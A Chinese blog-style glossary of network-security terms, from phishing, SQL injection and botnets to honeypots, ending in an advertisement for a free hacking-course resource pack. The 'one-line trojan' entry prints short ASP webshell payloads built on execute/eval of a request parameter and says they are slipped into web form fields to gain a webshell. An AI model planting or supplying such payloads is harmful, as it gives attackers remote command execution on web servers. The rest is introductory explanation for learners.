网安基本名词释义(非常详细)零基础入门到精通,收藏这一篇就够了

315 篇文章 3 订阅
177 篇文章 0 订阅

1、钓鱼攻击(Phishing)

网络钓鱼(Phishing,与钓鱼的英语fishing发音相近,又名钓鱼法或钓鱼式攻击)是通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮件,意图引诱收信人给出敏感信息(如用户名、口令、账号 ID 、 ATM PIN 码或信用卡详细信息)的一种攻击方式。

2、SQL注入(SQL injection)

SQL注入即是指****web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息

3、Web应用防火墙(Web Application Firewall,缩写WAF)

网络应用防火墙(WAF)是一种特殊形式的应用防火墙,它过滤、监控和阻止进出网络服务的HTTP流量。通过检查HTTP流量,它可以防止利用网络应用程序的已知漏洞的攻击,如SQL注入、跨站脚本(XSS)、文件包含和不当的系统配置

4、一句话木马

一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。

黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码:

<%execute request(“value”)%>

其中value是值,所以你可以更改自己的值,前面的request就是获取这个值

<%eval request(“value”)%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的实用)

当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell。(不知道数据库也可以,只要知道<%eval request(“value”)%>这个文件被插入到哪一个ASP文件里面就可以了。)

这就被称为一句话木马,它是基于B/S结构的。

5、网络嗅探****(Network sniffer)****

网络嗅探需要用到网络嗅探器,其最早是为网络管理人员配备的工具,有了嗅探器网络管理员可以随时掌握网络的实际情况,查找网络漏洞和检测网络性能,当网络性能急剧下降的时候,可以通过嗅探器分析网络流量,找出网络阻塞的来源。网络嗅探是网络监控系统的实现基础。

1、域名:

IP具有不方便记忆,且不能显示出组织的名称和性质等缺点,人们设计出了域名,并通过DNS(网域名称系统)来将域名和IP地址相互映射

2、二级域名:

二级域名分为两种。一种是在国际顶级域名下的二级域名,二级域名一般是指域名注册人选择使用的网上名称,如“yahoo.com”;上网的商业组织通常使用自己的商标、商号或其他商业标志作为自己的网上名称,如“microsoft.com”;还有一种是在国家顶级域名下的二级域名,在国家顶级域名之下二级域名一般是指类似于国际顶级域名的表示注册人类别和功能的标志。例如,在“.com.cn”域名结构中,“.com”此时是置于国家顶级域名“.cn”下的二级域名,表示商业性组织,以此类推

域名对安全测试的意义:相同的二级域名的网站架构、源码、密码可能相似。两个网站的域名解析的IP地址可能相同

3、HOSTS文件和DNS的关系

HOSTS文件中保存着Ip地址与域名的映射关系,当我们访问一个网站时,主机首先查找本地的HOSTS文件是否有该域名对应的IP地址,如果不存在,主机就会访问DNS服务器。

当入侵者修改HOSTS文件后,用户访问相关的域名就会定位到错误的网站

4、后门

后门是攻击者在非法入侵中留下的后门文件、以便下次操作。常见的后门有网站后门、服务器后门等

5、肉鸡

“肉鸡”是一种很形象的比喻,比喻那些被黑客控制的电脑,对方可以是Windows,也可以UNIX/LINUX系统,可以是普通的电脑,也可以是大型的服务器,一旦你的电脑成为“肉鸡”,就意味着别人可以随心所欲的操作你的电脑,而你不会发觉

6、木马

表面上伪装成正常的程序,实际上运行时会获取系统的整个控制权限,有很多黑客热衷于使用木马程序来控制别人的电脑。比如:灰鸽子、黑洞等

挂马:在别人的网站文件里面放入网页木马或者将代码写入到对方正常的网页文件里,使浏览者中马

1、Bastionhost:堡垒机

堡垒机,即在一个特定的网络环境下,为了保障网络和数据不受来自外部和内部用户的入侵和破坏,而运用各种技术手段监控和记录运维人员对网络内的服务器、网络设备、安全设备、数据库等设备的操作行为,以便集中报警、及时处理及审计定责。

用一句话来说,堡垒机就是用来控制哪些人可以登录哪些资产(事先防范和事中控制),以及录像记录登录资产后做了什么事情(溯源)

2、APT( Advanced Persistent Threat):高级持久威胁

指某组织对特定对象展开的持续有效的攻击活动。这种攻击活动具有极强的隐蔽性和针对性,通常会运用受感染的各种介质、供应链和社会工程学等多种手段实施先进的、持久的且有效的威胁和攻击

3、Botnet:僵尸网络

即黑客常说的傀儡机或“肉鸡”,指黑客利用自己编写的分布式拒绝服务攻击程序将数万个沦陷的机器,组织成一个个命令与控制节点,用来发送伪造虚假数据包或者是垃圾数据包

4、Brute force attack:爆破攻击/蛮力攻击
利用计算能力自动输入大量数字组合以发现密码并获得访问权限的攻击

5、Exploit kit:漏洞利用工具

设计用于发现软件应用程序中的漏洞并使用它们来访问系统或网络的计算机程序

6、Hashing:散列

散列函数又称散列算法、哈希函数,是一种从任何一种数据中创建小的数字“指纹”的方法。散列函数把消息或数据压缩成摘要,使得数据量变小,将数据的格式固定下来

1、字典攻击(Dictionary Attack)
在破解密码或密钥时,逐一尝试用户自定义词典中的可能密码(单词或短语)的攻击方式。

月黑风高之夜,一个小偷拿着从仓库管理员那儿偷来的一串钥匙,躲过岗哨摸到库房,看着库房大门挂着的大锁,哪一把钥匙才能打开门呢?显然最直接的方法就是一把一把地试,直到打开为止,或者所有钥匙都打不开,无功而返。

这件事儿对小偷来说略显机械枯燥,而且时间拖久了还有被抓的危险。可这样的重复劳动正适合计算机干——对了,这种方法就是网络安全领域里“字典攻击”的原型。

当黑客试图进入目标系统时被告知需要提供口令,而他对此并不知晓(正如上面那位小偷并不确定钥匙是哪一把),他可以采用这样的方法:将收藏的备选口令集(这个口令集可能包含着成千上万个备选口令)输入到他的程序中,依次向目标系统发起认证请求,直到某一个口令可以通过认证——或者所有这些口令均无效,宣告此方法失败并结束本次入侵行为(或者继续查找系统有无别的弱点)。

2、拒绝服务攻击(Dos攻击)

拒绝服务攻击即是攻击者想办法让目标机器停止提供服务,是黑客常用的攻击手段之一。其实对网络带宽进行的消耗性攻击只是拒绝服务攻击的一小部分,只要能够对目标造成麻烦,使某些服务被暂停甚至主机死机,都属于拒绝服务攻击。

拒绝服务攻击问题也一直得不到合理的解决,究其原因是因为网络协议本身的安全缺陷,从而拒绝服务攻击也成为了攻击者的终极手法。攻击者进行拒绝服务攻击,实际上让服务器实现两种效果:一是迫使服务器的缓冲区满,不接收新的请求;二是使用IP欺骗,迫使服务器把非法用户的连接复位,影响合法用户的连接。

3、分布式拒绝服务攻击(Distributed denial of service attack缩写DDos)

分布式拒绝服务攻击可以使很多的计算机在同一时间遭受到攻击,使攻击的目标无法正常使用,分布式拒绝服务攻击已经出现了很多次,导致很多的大型网站都出现了无法进行操作的情况,这样不仅仅会影响用户的正常使用,同时造成的经济损失也是非常巨大的。

分布式拒绝服务攻击方式在进行攻击的时候,可以对源IP地址进行伪造,这样就使得这种攻击在发生的时候隐蔽性是非常好的,同时要对攻击进行检测也是非常困难的,因此这种攻击方式也成为了非常难以防范的攻击。

4、逻辑炸弹(Logic bomb)

逻辑炸弹引发时的症状与某些病毒的作用结果相似,并会对社会引发连带性的灾难。与病毒相比,它强调破坏作用本身,而实施破坏的程序不具有传染性。逻辑炸弹是一种程序,或任何部分的程序,这是冬眠,直到一个具体作品的程序逻辑被激活。

计算机世界中的“逻辑炸弹”正是采用了这样的手法——当计算机系统运行的过程中恰好某个条件得到满足,如系统时间达到某个值、服务程序收到某个特定的消息,就触发恶意程序的执行并产生异常甚至灾难性后果,例如使某个进程无法正常运行、删除重要的磁盘分区、毁坏数据库数据,使系统瘫痪等等。在触发该条件之前系统运行却并未出现任何异常。对系统管理员和计算机用户来说,这样的恶意程序如同埋藏在计算机中的一颗地雷,同样惊心动魄。

5、宏病毒(Macro virus)

宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。

6、蠕虫病毒(Worm virus)

蠕虫病毒是一种常见的计算机病毒,是无须计算机使用者干预即可运行的独立程序,它通过不停地获得网络中存在漏洞的计算机上的部分或全部控制权来进行传播。计算机病毒是指编制或者在计算机程序中插入的破坏计算机功能或者破坏数据和恶意篡改系统.影响计算机使用并且能够自我复制的一组计算机指令或者程序代码。

一、内网渗透

内网渗透是一种网络安全技术,涉及通过特定的手段和方法,突破或访问一个组织的内部网络。

内网渗透通常是为了获取对内部系统的访问权限,如核心数据库或办公网等,内网渗透可能包括利用网络漏洞、通过配置不当的防火墙或入侵检测系统等手段,来达到访问内部网络的目的。

二、webshell

webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作命令。webshell主要用于网站和服务器管理,由于其便利性和功能强大,被特别修改后的webshell也被部分人当作网站后门工具使用

一方面,webshell被站长常常用于网站管理、服务器管理等等,根据FSO权限的不同,作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等。另一方面,被入侵者利用,从而达到控制网站服务器的目的。这些网页脚本常称为WEB脚本木马,比较流行的asp或php木马,也有基于.NET的脚本木马与JSP脚本木马。国内常用的WebShell有海阳ASP木马,Phpspy,c99shell等。

三、windows/linux提权

提高自己在服务器中的权限,主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限。

四、挖矿病毒(DTLMiner)

挖矿病毒是一种恶意程序,它通过各种手段被植入到受害者的计算机中,利用受害者的计算资源来挖掘加密货币。

挖矿病毒通常伪装成正常的文件,通过利用主机或操作系统的安全漏洞,结合高级攻击技术在局域网内传播,并控制电脑进行大量的计算运算来获取虚拟货币。这种病毒会消耗大量的计算机处理资源,可能导致电力资源的浪费。挖矿病毒可以通过多种方式传播,例如通过垃圾邮件、点击含有病毒的附件、下载非官方的破解软件,或者通过网页上的挖矿脚本。

五、零日漏洞(zero-day)
零日漏洞(zero-day)又叫零时差攻击,是指被发现后立即被恶意利用的安全漏洞。通俗地讲,即安全补丁与瑕疵曝光的同一日内,相关的恶意程序就出现。这种攻击往往具有很大的突发性与破坏性。

六、蜜罐

​蜜罐技术本质上是一种对攻击方进行欺骗的技术,通过布置一些作为诱饵的主机、网络服务或者信息,诱使攻击方对它们实施攻击,从而可以对攻击行为进行捕获和分析,了解攻击方所使用的工具与方法,推测攻击意图和动机,能够让防御方清晰地了解他们所面对的安全威胁,并通过技术和管理手段来增强实际系统的安全防护能力。

蜜罐好比是情报收集系统。蜜罐好像是故意让人攻击的目标,引诱黑客前来攻击。所以攻击者入侵后,你就可以知道他是如何得逞的,随时了解针对服务器发动的最新的攻击和漏洞。还可以通过窃听黑客之间的联系,收集黑客所用的种种工具,并且掌握他们的社交网络。

`黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

1.学习路线图

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。

(都打包成一块的了,不能一一展开,总共300多集)

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

  • 24
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值